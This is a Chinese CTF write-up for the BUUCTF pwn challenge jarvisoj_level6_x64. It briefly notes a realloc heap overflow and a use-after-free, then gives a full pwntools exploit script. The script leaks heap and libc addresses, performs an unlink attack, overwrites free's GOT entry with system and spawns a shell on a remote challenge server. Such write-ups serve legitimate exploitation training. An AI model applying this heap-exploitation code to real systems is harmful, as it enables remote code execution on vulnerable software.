buuctf-pwn:jarvisoj_level6_x64
jarvisoj_level6_x64
只能申请unsorted bin大小下的unlink
IDA看一下,可以发现edit里面有任意堆溢出的情况(realloc造成堆溢出)
然后free里面有UAF漏洞
然后几个注意的点,unlink直接可以模板化
1,泄漏地址 包括libc或者存放heap pointer的地址
2,unlink,伪造谁用谁的指针来unlink
3,修改heap为got指针也可以泄漏libc
exp
1 #coding:utf-8 2 ''' 3 author: lemon 4 time: 5 libc: 6 python version: 7 ''' 8 9 from pwn import * 10 from LibcSearcher import * 11 12 local = 0 13 14 binary = "./freenote_x64" 15 16 if local == 1: 17 p = process(binary) 18 else: 19 p = remote("node3.buuoj.cn",29231) 20 21 def dbg(): 22 context.log_level = 'debug' 23 24 context.terminal = ['tmux','splitw','-h'] 25 26 def add(size,content): 27 p.sendlineafter('Your choice:','2') 28 p.sendlineafter('Length of new note: ',str(size)) 29 p.sendafter('Enter your note:',content) 30 31 def free(index): 32 p.sendlineafter('Your choice: ','4') 33 p.sendlineafter('Note number: ',str(index)) 34 35 def show(): 36 p.sendlineafter('Your choice: ','1') 37 38 def edit(index,size,content): 39 p.sendlineafter('Your choice: ','3') 40 p.sendlineafter('Note number: ',str(index)) 41 p.sendlineafter('Length of note: ',str(size)) 42 p.sendafter('Enter your note: ',content) 43 44 add(0x80,0x80 * 'a') # chunk 0 45 add(0x80,0x80 * 'a') # chunk 1 46 add(0x80,0x80 * 'a') # chunk 2 47 add(0x80,0x80 * 'a') # chunk 3 48 add(0x80,0x80 * 'a') # chunk 4 49 50 edit(4,len("/bin/sh\x00"),"/bin/sh\x00") 51 52 #libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so') 53 54 print "unlink前先泄漏出堆的基地址" 55 56 free(3) 57 free(1) 58 59 payload = 0x90 * 'a' 60 edit(0,len(payload),payload) 61 show() 62 p.recvuntil(0x90 * 'a') 63 #heap = u64(p.recv(6) + '\x00\x00') 64 heap_0 = u64(p.recvuntil('\x0a',drop = True) + '\x00\x00\x00\x00') - 0x19a0 65 print "[*] heap:",hex(heap_0) 66 heap_4 = heap_0 + 0x1a40 67 68 69 print "unlink" 70 71 fd = heap_0 - 0x18 72 bk = heap_0 - 0x10 73 74 payload = p64(0) + p64(0x80) 75 payload += p64(fd) + p64(bk) 76 payload = payload.ljust(0x80,'\x00') 77 payload += p64(0x80) + p64(0x90) 78 edit(0,len(payload),payload) 79 80 free(1) 81 82 print "leak libc" 83 84 elf = ELF('./freenote_x64') 85 free_got = elf.got['free'] 86 print "[*] free:",hex(free_got) 87 88 payload = p64(2) + p64(1) + p64(0x8) + p64(free_got) #chunk0 size改为0x8 89 payload += p64(0) * 9 + p64(1) + p64(8) + p64(heap_4) 90 payload = payload.ljust(0x90,'\x00') 91 edit(0,len(payload),payload) 92 show() 93 free = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00')) 94 95 # libc_base = free - libc.sym['free'] 96 # system = libc_base + libc.sym['system'] 97 98 libc = LibcSearcher('free',free) 99 libc_base = free - libc.dump('free') 100 system = libc_base + libc.dump('system') 101 102 payload = p64(system) 103 edit(0,len(payload),payload) 104 105 #gdb.attach(p) 106 p.interactive()